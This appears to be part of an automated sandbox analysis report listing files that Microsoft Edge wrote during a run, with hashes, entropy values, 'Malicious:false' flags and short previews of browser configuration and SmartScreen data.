                                                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF54a8d.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.0906927501100725
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMewuF9hDO6vP6O+Itbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEg6Vtbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                                        MD5:ABCAB3E5B6E32C4E7C9F3D8DCB0B7BE1
                                                                                                                                                                                                                                                                                                                                                        SHA1:D9635CF0E4335C485684956EF9E53161BA7D718B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:5F87ED1527C56AA5561F6EFE2035C5A667C8599F324D15F4EDE24BD774C04A04
                                                                                                                                                                                                                                                                                                                                                        SHA-512:0F5A4EFDF2E3BED6DA596A56436D62C28269036EFCF8CDE7F35A168AC07E7ED447C8D5E512328617D93C05BF5900074C804F564E9C117D8EB6789AEF244485F0
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF5a521.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.0906927501100725
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMewuF9hDO6vP6O+Itbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEg6Vtbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                                        MD5:ABCAB3E5B6E32C4E7C9F3D8DCB0B7BE1
                                                                                                                                                                                                                                                                                                                                                        SHA1:D9635CF0E4335C485684956EF9E53161BA7D718B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:5F87ED1527C56AA5561F6EFE2035C5A667C8599F324D15F4EDE24BD774C04A04
                                                                                                                                                                                                                                                                                                                                                        SHA-512:0F5A4EFDF2E3BED6DA596A56436D62C28269036EFCF8CDE7F35A168AC07E7ED447C8D5E512328617D93C05BF5900074C804F564E9C117D8EB6789AEF244485F0
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):47
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                                                                                        MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                                                                                        SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                                                                                        SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                                                                                        SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):35
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                                                                                        MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                                                                                        SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                                                                                        SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                                                                                        SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):81
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                                                                                        MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                                                                                        SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                                                                                        SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                                                                                        SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):130439
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                                                                                        MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                                                                                        SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                                                                                        SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                                                                                        SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                                                                                        MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                                                                                        SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                                                                                        SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                                                                                        SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):57
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                                                                                        MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                                                                                        SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                                                                                        SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                                                                                        SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):29
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                                                                                        MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                                                                                        SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                                                                                        SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                                                                                        SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):575056
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                                                                                        MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                                                                                        SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                                                                                        SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                                                                                        SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):460992
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                                                                                        MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                                                                                        SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                                                                                        SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):9
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                                                                                        MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                                                                                        SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                                                                                        SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                                                                                        SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:uriCache_

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):179
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.010739368736396
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclUFUE/dNV:YWLSGTt1o9LuLgfGBPAzkVj/T8lUuE/5
                                                                                                                                                                                                                                                                                                                                                        MD5:14F8B9327213CF35FC095D98E6895731
                                                                                                                                                                                                                                                                                                                                                        SHA1:C681CFF105923B071A20A238B6E64E015509FABA
                                                                                                                                                                                                                                                                                                                                                        SHA-256:10EB2D70DA9DBA5DB33D9FFE2255FC40921126552D9B3C7EC5ECBF776048FCB7
                                                                                                                                                                                                                                                                                                                                                        SHA-512:1A59ECF38725D2D00924840D6FFA2A41CE674A39D7EF904920F3BAF39D50201F469468430616B2C0FE295DA71B13F57A75B8FBD67D6041AEB3DA2C0DD420DC68
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1731695175690085}]}

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                                                                                                                                                                                                        MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                                                                                                                                                                                                        SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                                                                                                                                                                                                        SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
